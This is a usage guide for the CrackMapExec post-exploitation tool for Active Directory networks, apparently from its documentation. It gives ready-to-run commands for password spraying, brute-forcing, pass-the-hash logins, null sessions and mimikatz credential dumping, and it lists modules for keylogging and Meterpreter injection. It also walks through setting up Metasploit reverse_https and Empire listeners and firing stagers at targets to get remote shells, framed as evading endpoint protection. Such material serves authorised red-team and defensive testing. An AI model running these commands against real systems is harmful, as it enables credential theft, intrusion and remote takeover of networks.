CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of “Living off the Land”: abusing built-in Active Directory features/protocols to achieve it’s functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.

CME makes heavy use of the Impacket library (developed by @asolino) and the PowerSploit Toolkit (developed by @mattifestation) for working with network protocols and performing a variety of post-exploitation techniques.

Although meant to be used primarily for offensive purposes (e.g. red teams), CME can be used by blue teams as well to assess account privileges, find possible misconfigurations and simulate attack scenarios.

CrackMapExec is developed by @byt3bl33d3r



To use a specific protocol run

cme <protocol> <protocol options>

To get help

 #~ cme --help
usage: cme [-h] [-v] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL]
          [--darrell] [--verbose]
          {http,smb,mssql} ...

     ______ .______           ___        ______  __  ___ .___  ___.      ___      .______    _______ ___   ___  _______   ______
    /      ||   _  \         /   \      /      ||  |/  / |   \/   |     /   \     |   _  \  |   ____|\  \ /  / |   ____| /      |
   |  ,----'|  |_)  |       /  ^  \    |  ,----'|  '  /  |  \  /  |    /  ^  \    |  |_)  | |  |__    \  V  /  |  |__   |  ,----'
   |  |     |      /       /  /_\  \   |  |     |    <   |  |\/|  |   /  /_\  \   |   ___/  |   __|    >   <   |   __|  |  |
   |  `----.|  |\  \----. /  _____  \  |  `----.|  .  \  |  |  |  |  /  _____  \  |  |      |  |____  /  .  \  |  |____ |  `----.
    \______|| _| `._____|/__/     \__\  \______||__|\__\ |__|  |__| /__/     \__\ | _|      |_______|/__/ \__\ |_______| \______|

                                        A swiss army knife for pentesting networks
                                   Forged by @byt3bl33d3r using the powah of dank memes

                                                     Version: 4.0.0dev
                                                    Codename: 'Sercurty'

optional arguments:
 -h, --help         show this help message and exit
 -v, --version      show program's version number and exit
 -t THREADS         set how many concurrent threads to use (default: 100)
 --timeout TIMEOUT  max timeout in seconds of each thread (default: None)
 --jitter INTERVAL  sets a random delay between each connection (default: None)
 --darrell          give Darrell a hand
 --verbose          enable verbose output

 available protocols

   http             own stuff using HTTP(S)
   smb              own stuff using SMB and/or Active Directory
   mssql            own stuff using MSSQL and/or Active Directory

retrieveng help for specific protocol

 #~ cme smb --help
usage: cme smb [-h] [-id CRED_ID [CRED_ID ...]] [-u USERNAME [USERNAME ...]]
              [-p PASSWORD [PASSWORD ...]]
              [--gfail-limit LIMIT | --ufail-limit LIMIT | --fail-limit LIMIT]
              [-M MODULE] [-o MODULE_OPTION [MODULE_OPTION ...]] [-L]
              [--options] [--server {http,https}] [--server-host HOST]
              [--server-port PORT] [-H HASH [HASH ...]]
              [-d DOMAIN | --local-auth] [--smb-port {139,445}]
              [--share SHARE] [--gen-relay-list OUTPUT_FILE]
              [--sam | --lsa | --ntds {vss,drsuapi}] [--shares] [--sessions]
              [--disks] [--loggedon-users] [--users [USER]]
              [--groups [GROUP]] [--local-groups [GROUP]] [--pass-pol]
              [--rid-brute [MAX_RID]] [--wmi QUERY]
              [--wmi-namespace NAMESPACE] [--spider SHARE]
              [--spider-folder FOLDER] [--content] [--exclude-dirs DIR_LIST]
              [--pattern PATTERN [PATTERN ...] | --regex REGEX [REGEX ...]]
              [--depth DEPTH] [--only-files]
              [--exec-method {mmcexec,smbexec,wmiexec,atexec}] [--force-ps32]
              [--no-output] [-x COMMAND | -X PS_COMMAND]
              [target [target ...]]

positional arguments:
 target                the target IP(s), range(s), CIDR(s), hostname(s),
                       FQDN(s) or file(s) containg a list of targets

optional arguments:
 -h, --help            show this help message and exit
 -id CRED_ID [CRED_ID ...]
                       database credential ID(s) to use for authentication
                       username(s) or file(s) containing usernames
                       password(s) or file(s) containing passwords
 --gfail-limit LIMIT   max number of global failed login attempts
 --ufail-limit LIMIT   max number of failed login attempts per username
 --fail-limit LIMIT    max number of failed login attempts per host
 -M MODULE, --module MODULE
                       payload module to use
                       payload module options
 -L, --list-modules    list available modules
 --options             display module options
 --server {http,https}
                       use the selected server (default: https)
 --server-host HOST    IP to bind the server to (default:
 --server-port PORT    start the server on the specified port
 -H HASH [HASH ...], --hash HASH [HASH ...]

-- SNIP --

Target Formats

Every protocol supports targets by CIDR notation(s), IP address(s), IP range(s), hostname(s), a file containing a list of targets or combination of all of the latter:

 crackmapexec <protocol>

crackmapexec <protocol>

crackmapexec <protocol>

crackmapexec <protocol>

crackmapexec <protocol> ~/targets.txt

Using Credentials

Every protocol supports using credentials in one form or another. For details on using credentials with a specific protocol, see the appropriate wiki section.

Generally speaking, to use credentials, you can run the following commands:

crackmapexec <protocol> <target(s)> -u username -p password

Note 1: When using usernames or passwords that contain special symbols, wrap them in single quotes to make your shell interpret them as a string.


crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@'

Note 2: Due to a bug in Python’s argument parsing library, credentials beginning with a dash (-) will throw an expected at least one argument error message. To get around this, specify the credentials by using the ‘long’ argument format (note the = sign):

crackmapexec <protocol> <target(s)> -u='-username' -p='-Admin!123@'

Using a credential set from the database

By specifying a credential ID (or multiple credential IDs) with the -id flag CME will automatically pull that credential from the back-end database and use it to authenticate (saves a lot of typing):

crackmapexec <protocol> <target(s)> -id <cred ID(s)>

Brute Forcing & Password Spraying

All protocols support brute-forcing and password spraying. For details on brute-forcing/password spraying with a specific protocol, see the appropriate wiki section.

By specifying a file or multiple values CME will automatically brute-force logins for all targets using the specified protocol:

 crackmapexec <protocol> <target(s)> -u username1 -p password1 password2

crackmapexec <protocol> <target(s)> -u username1 username2 -p password1

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

Using Modules

List them

cme <protocol> -L


  #~ cme smb -L
[*] met_inject                Downloads the Meterpreter stager and injects it into memory
[*] get_keystrokes            Logs keys pressed, time and the active window
[*] empire_exec               Uses Empire's RESTful API to generate a launcher for the specified listener and executes it

-- SNIP --

To run a module

cme <protocol> <target(s)> -M <module name>


crackmapexec smb <target(s)> -u Administrator -p 'P@ssw0rd' -M mimikatz

Viewing module options

cme <protocol> -M <module name> --options


#~ cme smb -M mimikatz --options

Module options are specified with the -o flag. All options are specified in the form of KEY=value (msfvenom style)


#~ cme <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M mimikatz -o COMMAND='privilege::debug'


CME automatically stores all used/dumped credentials (along with other information) in it’s database which is setup on first run.

As of CME v4 each protocol has it’s own database which makes things much more sane and allows for some awesome possibilities. Additionally, v4 introduces workspaces (similar to Metasploit).

For details and usage of a specific protocol’s database see the appropriate wiki section.

All workspaces and their relative databases are stored in ~/.cme/workspaces

CME ships with a secondary command line script cmedb which abstracts interacting with the back-end database. Typing the command cmedb will drop you into a command shell:

 #~ cmedb
cmedb (default) >


The default workspace name is called ‘default’ (as represented within the prompt), once a workspace is selected everything that you do in CME will be stored in that workspace.

To create a workspace:

 cmedb (default) > workspace create test
[*] Creating workspace 'test'
[*] Initializing HTTP protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
cmedb (test) >

To switch workspace:

 cmedb (test) > workspace default
cmedb (default) >

Protocol DB

To access a protocol’s database simply run proto <protocol>, for example:

 cmedb (test) > proto smb
cmedb (test)(smb) >

Using Credentials


CME supports authenticating via SMB using Passing-The-Hash attacks with the -H flag:

 crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH

crackmapexec smb <target(s)> -u username -H NTHASH

NULL Sessions

You can log in with a null session by using ‘’ as the username and/or password

crackmapexec smb <target(s)> -u '' -p ''

Getting Shells

We all love shells and that’s why CME makes it as easy as possible to get them! There really is something magical about shelling a /24

Empire Agent

We can use the empire_exec module to execute an Empire Agent’s initial stager. In the background, the module connects to Empire’s RESTful API, generates a launcher for the specified listener and executes it.

  • First setup an Empire listener:
 (Empire: listeners) > set Name test
(Empire: listeners) > set Host
(Empire: listeners) > set Port 9090
(Empire: listeners) > set CertPath data/empire.pem
(Empire: listeners) > run
(Empire: listeners) > list

[*] Active listeners:

 ID    Name              Host                                 Type      Delay/Jitter   KillDate    Redirect Target
 --    ----              ----                                 -------   ------------   --------    ---------------
 1     test                     native    5/0.0

(Empire: listeners) >
  • Start up Empire’s RESTful API server:
 #~ python empire --rest --user empireadmin --pass Password123!

[*] Loading modules from: /home/byt3bl33d3r/Tools/Empire/lib/modules/
 * Starting Empire RESTful API on port: 1337
 * RESTful API token: l5l051eqiqe70c75dis68qjheg7b19di7n8auzml
 * Running on (Press CTRL+C to quit)

The username and password that CME uses to authenticate to Empire’s RESTful API are stored in the cme.conf file located at ~/.cme/cme.conf:


  • Then just run the empire_exec module and specify the listener name:
#~ crackmapexec -u username -p password -M empire_exec -o LISTENER=test


We can use the metinject module to directly inject meterpreter into memory using PowerSploit’s Invoke-Shellcode.ps1 script.

  • First setup your handler:
 msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST
msf exploit(handler) > set exitonsession false
exitonsession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on
msf exploit(handler) > [*] Starting the payload handler...
  • Then just run the metinject module and specify the LHOST and LPORT values:
#~ crackmapexec -u username -p password -M metinject -o LHOST= LPORT=8443